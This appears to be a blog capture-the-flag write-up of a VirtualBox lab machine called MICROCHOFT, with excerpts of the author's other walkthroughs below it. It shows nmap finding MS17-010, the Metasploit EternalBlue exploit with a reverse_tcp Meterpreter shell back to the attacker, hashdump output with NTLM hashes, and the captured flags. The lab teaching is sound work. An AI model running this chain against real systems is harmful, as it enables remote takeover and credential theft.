MICROCHOFT MACHINE

 MICROCHOFT 


The first step was network reconnaissance to identify the target machine, arp-scan was used to find active hosts on the local network, confirming the existence of the host at 192.168.88.4.
┌──(luis㉿kali)-[~]
└─$ sudo arp-scan -I eth0 --localnet
[sudo] contraseña para luis:
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1    d8:44:89:50:2d:a3    (Unknown)
192.168.88.3    00:e0:4c:97:01:a7    (Unknown)
192.168.88.4    08:00:27:f7:3a:b3    (Unknown)

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.998 seconds (128.13 hosts/sec). 3 responded
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed that ports 445 (SMB),139 (rpc)and  (HTTP) were open.
┌──(luis㉿kali)-[~]
└─$ sudo nmap -n -Pn  -p- --min-rate 5000 192.168.88.4 -vvv -sV -vvv
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-25 17:15 CEST
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 17:15
Scanning 192.168.88.4 [1 port]
Completed ARP Ping Scan at 17:15, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:15
Scanning 192.168.88.4 [65535 ports]
Discovered open port 445/tcp on 192.168.88.4
Discovered open port 135/tcp on 192.168.88.4
Discovered open port 139/tcp on 192.168.88.4
Discovered open port 49152/tcp on 192.168.88.4
Discovered open port 49157/tcp on 192.168.88.4
Discovered open port 49154/tcp on 192.168.88.4
Discovered open port 49153/tcp on 192.168.88.4
Discovered open port 49156/tcp on 192.168.88.4
Discovered open port 49155/tcp on 192.168.88.4
Completed SYN Stealth Scan at 17:15, 13.22s elapsed (65535 total ports)
Initiating Service scan at 17:15
Scanning 9 services on 192.168.88.4
Service scan Timing: About 44.44% done; ETC: 17:17 (0:01:06 remaining)
Completed Service scan at 17:16, 58.61s elapsed (9 services on 1 host)
NSE: Script scanning 192.168.88.4.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:16
Completed NSE at 17:16, 0.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:16
Completed NSE at 17:16, 0.01s elapsed
Nmap scan report for 192.168.88.4
Host is up, received arp-response (0.00084s latency).
Scanned at 2025-09-25 17:15:20 CEST for 72s
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:F7:3A:B3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: MICROCHOFT; OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.47 seconds
           Raw packets sent: 67812 (2.984MB) | Rcvd: 65539 (2.622MB)

In addition, we can see when we exdcute again nmap toolkit we  have been discovered a vulnerability in 445 port as you can see below (ms17-010).
┌──(luis㉿kali)-[~]
└─$ sudo nmap -n -Pn -p 445 192.168.88.4  -vvv --script=vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-25 17:23 CEST
NSE: Loaded 105 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 10.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 0.00s elapsed
Initiating ARP Ping Scan at 17:23
Scanning 192.168.88.4 [1 port]
Completed ARP Ping Scan at 17:23, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:23
Scanning 192.168.88.4 [1 port]
Discovered open port 445/tcp on 192.168.88.4
Completed SYN Stealth Scan at 17:23, 0.02s elapsed (1 total ports)
NSE: Script scanning 192.168.88.4.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 5.02s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 0.00s elapsed
Nmap scan report for 192.168.88.4
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-09-25 17:23:38 CEST for 5s

PORT    STATE SERVICE      REASON
445/tcp open  microsoft-ds syn-ack ttl 128
MAC Address: 08:00:27:F7:3A:B3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_smb-vuln-ms10-054: false

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:23
Completed NSE at 17:23, 0.00s elapsed
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.51 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
Now let's go to open msfconsole as you can see below and then we have to execute search ms17-010 to search the exploit which you can see below taht is the next:
exploit/windows/smb/ms17_010_eternalblue
msf > search  ms17-010

Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1     \_ target: Automatic Target                  .                .        .      .
   2     \_ target: Windows 7                         .                .        .      .
   3     \_ target: Windows Embedded Standard 7       .                .        .      .
   4     \_ target: Windows Server 2008 R2            .                .        .      .
   5     \_ target: Windows 8                         .                .        .      .
   6     \_ target: Windows 8.1                       .                .        .      .
   7     \_ target: Windows Server 2012               .                .        .      .
   8     \_ target: Windows 10 Pro                    .                .        .      .
   9     \_ target: Windows 10 Enterprise Evaluation  .                .        .      .

Now we have to execute the next configuration as you can see below:
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
show options
set RHOSTS (VICTIM IP which is 192.168.88.4)
run or exploit 
msf > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/usin
                                             g-metasploit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only
                                              affects Windows Server 2008 R2, Windows 7, Windows Embedded
                                             Standard 7 target machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only aff
                                             ects Windows Server 2008 R2, Windows 7, Windows Embedded Stan
                                             dard 7 target machines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windo
                                             ws Server 2008 R2, Windows 7, Windows Embedded Standard 7 tar
                                             get machines.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.88.6     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

View the full module info with the info, or info -d command.
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.88.4
RHOSTS => 192.168.88.4

msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.88.4     yes     

msf exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.88.6:4444
[*] 192.168.88.4:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.88.4:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.21/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression
[*] 192.168.88.4:445      - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.88.4:445 - The target is vulnerable.
[*] 192.168.88.4:445 - Connecting to target for exploitation.
[+] 192.168.88.4:445 - Connection established for exploitation.
[+] 192.168.88.4:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.88.4:445 - CORE raw buffer dump (40 bytes)
[*] 192.168.88.4:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B
[*] 192.168.88.4:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic
[*] 192.168.88.4:445 - 0x00000020  65 20 50 61 63 6b 20 31                          e Pack 1        
[+] 192.168.88.4:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.88.4:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.88.4:445 - Sending all but last fragment of exploit packet
[*] 192.168.88.4:445 - Starting non-paged pool grooming
[+] 192.168.88.4:445 - Sending SMBv2 buffers
[+] 192.168.88.4:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.88.4:445 - Sending final SMBv2 buffers.
[*] 192.168.88.4:445 - Sending last fragment of exploit packet!
[*] 192.168.88.4:445 - Receiving response from exploit packet
[+] 192.168.88.4:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.88.4:445 - Sending egg to corrupted connection.
[*] 192.168.88.4:445 - Triggering free of corrupted buffer.
[*] Sending stage (203846 bytes) to 192.168.88.4
[*] Meterpreter session 1 opened (192.168.88.6:4444 -> 192.168.88.4:49160) at 2025-09-25 17:34:49 +0200
[+] 192.168.88.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.4:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gotcha! we have just obtained access to remote machine as you can see below.
meterpreter >
msf 
In addition, we can execute the next commands as you can see below which are:
sessions (To see sessions in meterpreter)
getprivs (To see privileges into the machine)
hashdump (To obtain hashes from different users into the machine)
shell (To execute command into the machine)
exploit(windows/smb/ms17_010_eternalblue) > sessions
Active sessions
===============
  Id  Name  Type                     Information                       Connection
  --  ----  ----                     -----------                       ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ MICROCHOFT  192.168.88.6:4444 -> 192.168.88.4:4
                                                                       9160 (192.168.88.4)
msf exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > getprivs

Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege
meterpreter > hashdump
Admin:1000:aad3b435b51404eeaad3b435b51404ee:f8d3fa263b636cb5c66ed100d7a30226:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f8d3fa263b636cb5c66ed100d7a30226:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lola:1001:aad3b435b51404eeaad3b435b51404ee:f8d3fa263b636cb5c66ed100d7a30226:::

C:\Windows\system32>cd ..
cd ..

C:\Windows>ls
ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 44E2-21EC

 Directory of C:\Windows

03/28/2024  06:37 PM    <DIR>          .
03/28/2024  06:37 PM    <DIR>          ..
07/14/2009  07:32 AM    <DIR>          addins
07/14/2009  05:20 AM    <DIR>          AppCompat
11/21/2010  05:29 AM    <DIR>          AppPatch
11/21/2010  05:24 AM            71,168 bfsvc.exe
07/14/2009  07:32 AM    <DIR>          Boot
07/14/2009  07:32 AM    <DIR>          Branding
07/14/2009  07:32 AM    <DIR>          Cursors
03/28/2024  06:35 PM    <DIR>          debug
07/14/2009  07:32 AM    <DIR>          diagnostics
07/14/2009  07:37 AM    <DIR>          DigitalLocker
07/14/2009  07:32 AM    <DIR>          Downloaded Program Files
03/29/2024  02:35 AM             2,790 DtcInstall.log
04/12/2011  10:17 AM    <DIR>          en-US
11/21/2010  05:24 AM         2,872,320 explorer.exe
07/14/2009  03:39 AM            15,360 fveupdate.exe
04/12/2011  10:30 AM    <DIR>          Globalization
04/12/2011  10:17 AM    <DIR>          Help
07/14/2009  03:39 AM           733,696 HelpPane.exe
07/14/2009  03:39 AM            16,896 hh.exe
06/10/2009  10:30 PM            48,223 HomeBasic.xml
07/14/2009  07:37 AM    <DIR>          IME
09/25/2025  05:14 PM    <DIR>          inf
07/14/2009  07:32 AM    <DIR>          L2Schemas
07/14/2009  04:34 AM    <DIR>          LiveKernelReports
07/14/2009  07:32 AM    <DIR>          Logs
07/14/2009  01:06 AM            43,131 mib.bin
11/21/2010  05:52 AM    <DIR>          Microsoft.NET
07/14/2009  04:34 AM    <DIR>          ModemLogs
06/10/2009  10:36 PM             1,405 msdfmap.ini
07/14/2009  03:39 AM           193,536 notepad.exe
07/14/2009  07:32 AM    <DIR>          Offline Web Pages
03/28/2024  06:36 PM    <DIR>          Panther
07/14/2009  07:32 AM    <DIR>          Performance
11/21/2010  05:47 AM             4,568 PFRO.log
07/14/2009  05:20 AM    <DIR>          PLA
11/21/2010  05:30 AM    <DIR>          PolicyDefinitions
09/25/2025  05:39 PM    <DIR>          Prefetch
07/14/2009  03:39 AM           427,008 regedit.exe
07/14/2009  05:20 AM    <DIR>          Registration
03/28/2024  06:36 PM    <DIR>          rescache
07/14/2009  07:32 AM    <DIR>          Resources
07/14/2009  04:35 AM    <DIR>          SchCache
07/14/2009  07:32 AM    <DIR>          schemas
07/14/2009  05:20 AM    <DIR>          security
07/14/2009  06:45 AM    <DIR>          ServiceProfiles
04/12/2011  10:17 AM    <DIR>          servicing
07/14/2009  06:45 AM    <DIR>          Setup
09/25/2025  06:10 PM            21,917 setupact.log
07/14/2009  06:51 AM                 0 setuperr.log
03/28/2024  06:38 PM    <DIR>          SoftwareDistribution
04/12/2011  10:17 AM    <DIR>          Speech
11/21/2010  05:24 AM            67,072 splwow64.exe
06/10/2009  10:31 PM            48,201 Starter.xml
07/14/2009  04:36 AM    <DIR>          system
06/10/2009  11:08 PM               219 system.ini
09/25/2025  05:14 PM    <DIR>          System32
04/12/2011  10:27 AM    <DIR>          SysWOW64
07/14/2009  06:57 AM    <DIR>          TAPI
07/14/2009  07:08 AM    <DIR>          Tasks
09/25/2025  05:39 PM    <DIR>          Temp
07/14/2009  04:34 AM    <DIR>          tracing
03/29/2024  02:34 AM             1,355 TSSysprep.log
06/10/2009  11:41 PM            94,784 twain.dll
07/14/2009  07:32 AM    <DIR>          twain_32
11/21/2010  05:25 AM            51,200 twain_32.dll
06/10/2009  11:41 PM            49,680 twunk_16.exe
07/14/2009  03:14 AM            31,232 twunk_32.exe
07/14/2009  05:20 AM    <DIR>          Vss
07/14/2009  07:32 AM    <DIR>          Web
07/14/2009  07:09 AM               403 win.ini
09/25/2025  05:16 PM            15,859 WindowsUpdate.log
07/14/2009  03:14 AM             9,728 winhlp32.exe
03/28/2024  06:46 PM    <DIR>          winsxs
06/10/2009  10:52 PM           316,640 WMSysPr9.prx
07/14/2009  03:39 AM            10,240 write.exe
              27 File(s)      5,148,631 bytes
              50 Dir(s)  24,564,617,216 bytes free
C:\Windows>cd ..
cd ..

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 44E2-21EC

 Directory of C:\

07/14/2009  05:20 AM    <DIR>          PerfLogs
07/14/2009  07:09 AM    <DIR>          Program Files
07/14/2009  06:57 AM    <DIR>          Program Files (x86)
03/28/2024  06:52 PM    <DIR>          Users
03/28/2024  06:36 PM             1,449 vboxpostinstall.log
03/28/2024  06:37 PM    <DIR>          Windows
               1 File(s)          1,449 bytes
               5 Dir(s)  24,565,141,504 bytes free
C:\>cd Users    
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 44E2-21EC

 Directory of C:\Users

03/28/2024  06:52 PM    <DIR>          .
03/28/2024  06:52 PM    <DIR>          ..
03/28/2024  06:36 PM    <DIR>          Admin
03/28/2024  06:52 PM    <DIR>          Lola
07/14/2009  06:54 AM    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  24,565,141,504 bytes free

C:\Users\Lola>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 44E2-21EC

 Directory of C:\Users\Lola

03/28/2024  06:52 PM    <DIR>          .
03/28/2024  06:52 PM    <DIR>          ..
03/28/2024  06:52 PM    <DIR>          Contacts
03/28/2024  06:54 PM    <DIR>          Desktop
03/28/2024  06:52 PM    <DIR>          Documents
03/28/2024  06:52 PM    <DIR>          Downloads
03/28/2024  06:52 PM    <DIR>          Favorites
03/28/2024  06:52 PM    <DIR>          Links
03/28/2024  06:52 PM    <DIR>          Music
03/28/2024  06:52 PM    <DIR>          Pictures
03/28/2024  06:52 PM    <DIR>          Saved Games
03/28/2024  06:52 PM    <DIR>          Searches
03/28/2024  06:52 PM    <DIR>          Videos
               0 File(s)              0 bytes
              13 Dir(s)  24,564,617,216 bytes free

C:\Users\Lola>cd Desktop
cd Desktop

C:\Users\Lola\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 44E2-21EC

 Directory of C:\Users\Lola\Desktop

03/28/2024  06:54 PM    <DIR>          .
03/28/2024  06:54 PM    <DIR>          ..
03/28/2024  06:54 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  24,564,408,320 bytes free
Gotha! we have got the user flag which you can see below.
C:\Users\Lola\Desktop>type user.txt
type user.txt
13e624146d31ea232c850267c2745caa

C:\Users\Lola\Desktop>type user.txt
type user.txt
13e624146d31ea232c850267c2745caa
C:\Users\Lola\Desktop>cd C:\Users\Admin\Desktop
cd C:\Users\Admin\Desktop

C:\Users\Admin\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 44E2-21EC

 Directory of C:\Users\Admin\Desktop

03/28/2024  06:50 PM    <DIR>          .
03/28/2024  06:50 PM    <DIR>          ..
03/28/2024  06:51 PM                32 admin.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24,564,408,320 bytes free
Gotha! we have got the root flag which you can see below.
C:\Users\Admin\Desktop>type admin.txt.txt
type admin.txt.txt
ff4ad2daf333183677e02bf8f67d4dca
 Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »